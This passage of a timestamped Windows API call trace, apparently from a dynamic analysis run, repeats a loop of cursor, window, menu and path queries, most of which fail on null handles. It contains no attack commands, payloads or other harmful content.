MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.505] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.505] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.505] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.505] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.505] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.505] GetStockObject (i=6) returned 0x1b00018 [0027.505] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.505] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.505] PathFileExistsW (pszPath=0x0) returned 0 [0027.505] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.505] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.505] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.505] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.505] GetMenu (hWnd=0x0) returned 0x0 [0027.505] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.505] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.505] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.505] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.505] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.505] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.505] GetStockObject (i=6) returned 0x1b00018 [0027.505] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.506] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.506] PathFileExistsW (pszPath=0x0) returned 0 [0027.506] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.506] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.506] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.506] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.506] GetMenu (hWnd=0x0) returned 0x0 [0027.506] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2cb) returned -1 [0027.506] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.506] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.506] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.506] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.506] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.506] GetStockObject (i=6) returned 0x1b00018 [0027.506] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.506] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.506] PathFileExistsW (pszPath=0x0) returned 0 [0027.506] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.506] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.506] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.506] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.506] GetMenu (hWnd=0x0) returned 0x0 [0027.506] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.506] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.506] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.506] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.506] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.506] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.506] GetStockObject (i=6) returned 0x1b00018 [0027.506] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.506] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.506] PathFileExistsW (pszPath=0x0) returned 0 [0027.506] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.506] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.507] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.507] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.507] GetMenu (hWnd=0x0) returned 0x0 [0027.507] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.507] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.507] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.507] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.507] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.507] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.507] GetStockObject (i=6) returned 0x1b00018 [0027.507] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.507] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.507] PathFileExistsW (pszPath=0x0) returned 0 [0027.507] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.507] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.507] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.507] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.507] GetMenu (hWnd=0x0) returned 0x0 [0027.507] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.507] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.507] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.507] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.507] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.507] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.507] GetStockObject (i=6) returned 0x1b00018 [0027.507] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.507] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.507] PathFileExistsW (pszPath=0x0) returned 0 [0027.507] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.507] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.507] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.507] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.507] GetMenu (hWnd=0x0) returned 0x0 [0027.507] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.508] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.508] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.508] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.508] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.508] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.508] GetStockObject (i=6) returned 0x1b00018 [0027.508] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.508] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.508] PathFileExistsW (pszPath=0x0) returned 0 [0027.508] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.508] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.508] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.508] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.508] GetMenu (hWnd=0x0) returned 0x0 [0027.508] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x59a) returned -1 [0027.508] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.508] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.508] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.508] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.508] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.508] GetStockObject (i=6) returned 0x1b00018 [0027.508] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.508] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.508] PathFileExistsW (pszPath=0x0) returned 0 [0027.508] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.508] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.508] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.508] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.508] GetMenu (hWnd=0x0) returned 0x0 [0027.508] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.508] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.508] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.508] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.508] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.509] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.509] GetStockObject (i=6) returned 0x1b00018 [0027.509] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.509] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.509] PathFileExistsW (pszPath=0x0) returned 0 [0027.509] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.509] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.509] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.509] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.509] GetMenu (hWnd=0x0) returned 0x0 [0027.509] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.509] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.509] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.509] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.509] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.509] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.509] GetStockObject (i=6) returned 0x1b00018 [0027.509] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.509] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.509] PathFileExistsW (pszPath=0x0) returned 0 [0027.509] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.509] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.509] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.509] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.509] GetMenu (hWnd=0x0) returned 0x0 [0027.509] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.509] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.509] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.509] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.509] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.509] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.509] GetStockObject (i=6) returned 0x1b00018 [0027.509] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.510] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.510] PathFileExistsW (pszPath=0x0) returned 0 [0027.510] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.510] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.510] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.510] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.510] GetMenu (hWnd=0x0) returned 0x0 [0027.510] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.510] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.510] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.510] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.510] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.510] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.510] GetStockObject (i=6) returned 0x1b00018 [0027.510] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.510] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.510] PathFileExistsW (pszPath=0x0) returned 0 [0027.510] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.510] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.510] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.510] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.510] GetMenu (hWnd=0x0) returned 0x0 [0027.510] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x102) returned -1 [0027.510] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.510] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.510] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.510] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.510] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.510] GetStockObject (i=6) returned 0x1b00018 [0027.510] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.510] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.510] PathFileExistsW (pszPath=0x0) returned 0 [0027.510] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.510] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.511] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.511] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.511] GetMenu (hWnd=0x0) returned 0x0 [0027.511] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.511] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.511] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.511] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.511] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.511] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.511] GetStockObject (i=6) returned 0x1b00018 [0027.511] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.511] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.511] PathFileExistsW (pszPath=0x0) returned 0 [0027.511] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.511] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.511] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.511] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.511] GetMenu (hWnd=0x0) returned 0x0 [0027.511] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.511] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.511] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.511] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.511] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.511] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.511] GetStockObject (i=6) returned 0x1b00018 [0027.511] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.511] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.511] PathFileExistsW (pszPath=0x0) returned 0 [0027.511] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.511] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.511] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.511] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.511] GetMenu (hWnd=0x0) returned 0x0 [0027.512] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.512] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.512] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.512] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.512] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.512] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.512] GetStockObject (i=6) returned 0x1b00018 [0027.512] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.512] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.512] PathFileExistsW (pszPath=0x0) returned 0 [0027.512] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.512] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.512] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.512] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.512] GetMenu (hWnd=0x0) returned 0x0 [0027.512] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.512] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.512] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.512] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.512] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.512] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.512] GetStockObject (i=6) returned 0x1b00018 [0027.512] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.512] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.512] PathFileExistsW (pszPath=0x0) returned 0 [0027.512] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.512] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.512] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.512] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.512] GetMenu (hWnd=0x0) returned 0x0 [0027.512] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x50c) returned -1 [0027.512] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.512] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.513] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.513] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.513] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.513] GetStockObject (i=6) returned 0x1b00018 [0027.513] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.513] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.513] PathFileExistsW (pszPath=0x0) returned 0 [0027.513] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.513] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.513] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.513] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.513] GetMenu (hWnd=0x0) returned 0x0 [0027.513] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.513] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.513] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.513] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.513] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.513] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.513] GetStockObject (i=6) returned 0x1b00018 [0027.513] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.513] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.513] PathFileExistsW (pszPath=0x0) returned 0 [0027.513] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.513] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.513] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.513] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.513] GetMenu (hWnd=0x0) returned 0x0 [0027.513] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.513] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.513] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.513] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.513] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.513] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.514] GetStockObject (i=6) returned 0x1b00018 [0027.514] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.514] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.514] PathFileExistsW (pszPath=0x0) returned 0 [0027.514] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.514] GetCursorPos (in: lpPoint=0x18f5e4 | out: 